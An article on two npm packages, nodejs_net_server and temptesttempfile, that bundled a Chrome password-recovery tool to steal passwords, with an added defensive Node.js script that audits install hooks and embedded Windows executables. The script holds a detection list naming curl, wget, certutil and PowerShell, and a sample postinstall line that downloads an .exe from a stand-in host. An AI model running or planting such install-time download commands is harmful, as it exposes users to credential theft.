Code published to the npm registry has been caught stealing passwords from Chrome on Windows by bundling a legitimate password-recovery tool. That is based on recent reports detailing the malicious code, which was found in two packages in the npm repository.
The issue stems from a Windows .exe file embedded in the two packages. ReversingLabs researchers found the file, detected as “Win32.Infostealer.Heuristics,” in the packages “nodejs_net_server” and “temptesttempfile.”
What was going on with this?
Digging deeper, nodejs_net_server is a package with 12 published versions and more than 1,300 downloads since early 2019. Its most recent update was six months ago, and its authorship is attributed to “chrunlee,” a name which also appears on GitHub. The package was not malicious from the start: it was the version 1.1.0 update, in December 2020, that added a script to download the password-stealing tool mentioned above.
The second package, “temptesttempfile,” is more mysterious. As of this writing it does not appear to have done much of anything, beyond containing the same remote shell functionality found in other versions of the nodejs_net_server package. In this case that code does not appear to have been triggered, or at the very least it did not execute the password-stealing tool.
The password-stealing tool itself is the ChromePass utility for Windows, published by NirSoft. ChromePass is a legitimate utility ordinarily used to retrieve and view passwords stored in Google’s Chrome browser; here it was repurposed to harvest them from victims.
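The two tells described above, a lifecycle script that fetches a binary at install time and a Windows executable shipped inside the package, are things a practitioner can check for before letting a package run. The following Node.js script is an added example written for this article; it is not code from the packages or from ReversingLabs. The manifest and file contents it audits are constructed samples, and the list of suspicious command patterns is a heuristic of the author's choosing, not the detection ReversingLabs used.

```javascript
// Added example (not from the original article or the malicious packages):
// audit an npm package manifest and its files for two install-time tells,
// a lifecycle script that pulls down or launches a binary, and an embedded
// Windows PE image. All sample input below is constructed for the demo.

// npm runs these hooks automatically during `npm install`.
const SCRIPT_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish'];

// Heuristic patterns (assumption: chosen for this example, not a signature)
// that commonly appear when an install script fetches and runs a native binary.
const SUSPICIOUS = [
  /\bcurl\b/i, /\bwget\b/i, /\bcertutil\b/i, /Invoke-WebRequest/i,
  /\bpowershell\b/i, /https?:\/\//i, /\.exe\b/i, /child_process/i,
];

// Returns one finding per lifecycle hook present in the manifest.
function auditScripts(manifest) {
  const findings = [];
  const scripts = (manifest && manifest.scripts) || {};
  for (const hook of SCRIPT_HOOKS) {
    if (!(hook in scripts)) continue;
    const cmd = String(scripts[hook]);
    const hits = SUSPICIOUS.filter((re) => re.test(cmd)).map((re) => re.source);
    findings.push({ hook, cmd, suspicious: hits.length > 0, hits });
  }
  return findings;
}

// A Windows PE image starts with the two-byte "MZ" DOS stub header. Checking
// the bytes rather than the extension catches binaries renamed to .dat etc.
function isPEImage(bytes) {
  return bytes.length >= 2 && bytes[0] === 0x4d && bytes[1] === 0x5a;
}

// files: array of { path, bytes } where bytes is a Buffer or Uint8Array.
// Flags anything with a PE header or an executable-looking extension.
function auditFiles(files) {
  return files
    .filter((f) => isPEImage(f.bytes) || /\.(exe|dll|scr)$/i.test(f.path))
    .map((f) => ({ path: f.path, peHeader: isPEImage(f.bytes) }));
}

// ---- constructed sample input ----
const sampleManifest = {
  name: 'constructed-sample',
  version: '1.1.0',
  scripts: {
    test: 'node test.js',
    postinstall: 'node lib/setup.js && curl -o %TEMP%\\tool.exe http://example.invalid/tool.exe',
  },
};

const sampleFiles = [
  { path: 'lib/index.js', bytes: Buffer.from('module.exports = {};') },
  { path: 'bin/helper.dat', bytes: Buffer.from([0x4d, 0x5a, 0x90, 0x00]) }, // renamed PE
  { path: 'bin/tool.exe', bytes: Buffer.from([0x4d, 0x5a, 0x90, 0x00]) },
];

function demo() {
  console.log(JSON.stringify(auditScripts(sampleManifest), null, 2));
  console.log(JSON.stringify(auditFiles(sampleFiles), null, 2));
}

demo();
```

To run it against a real package, parse its package.json with JSON.parse and build the `{ path, bytes }` list from fs.readFileSync over the package directory. While inspecting, install with `npm install --ignore-scripts` so that none of the hooks above execute before you have looked at them.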
Have the malicious packages been removed from npm?
ReversingLabs first reported the packages to the npm security team on July 2. That report appears to have prompted npm, Inc. to launch its own investigation, and following that investigation the company removed both malicious packages from its repository. Removal was not immediate, however: ReversingLabs reportedly had to contact npm again on July 15, because the malicious package was still live in the repository at that time.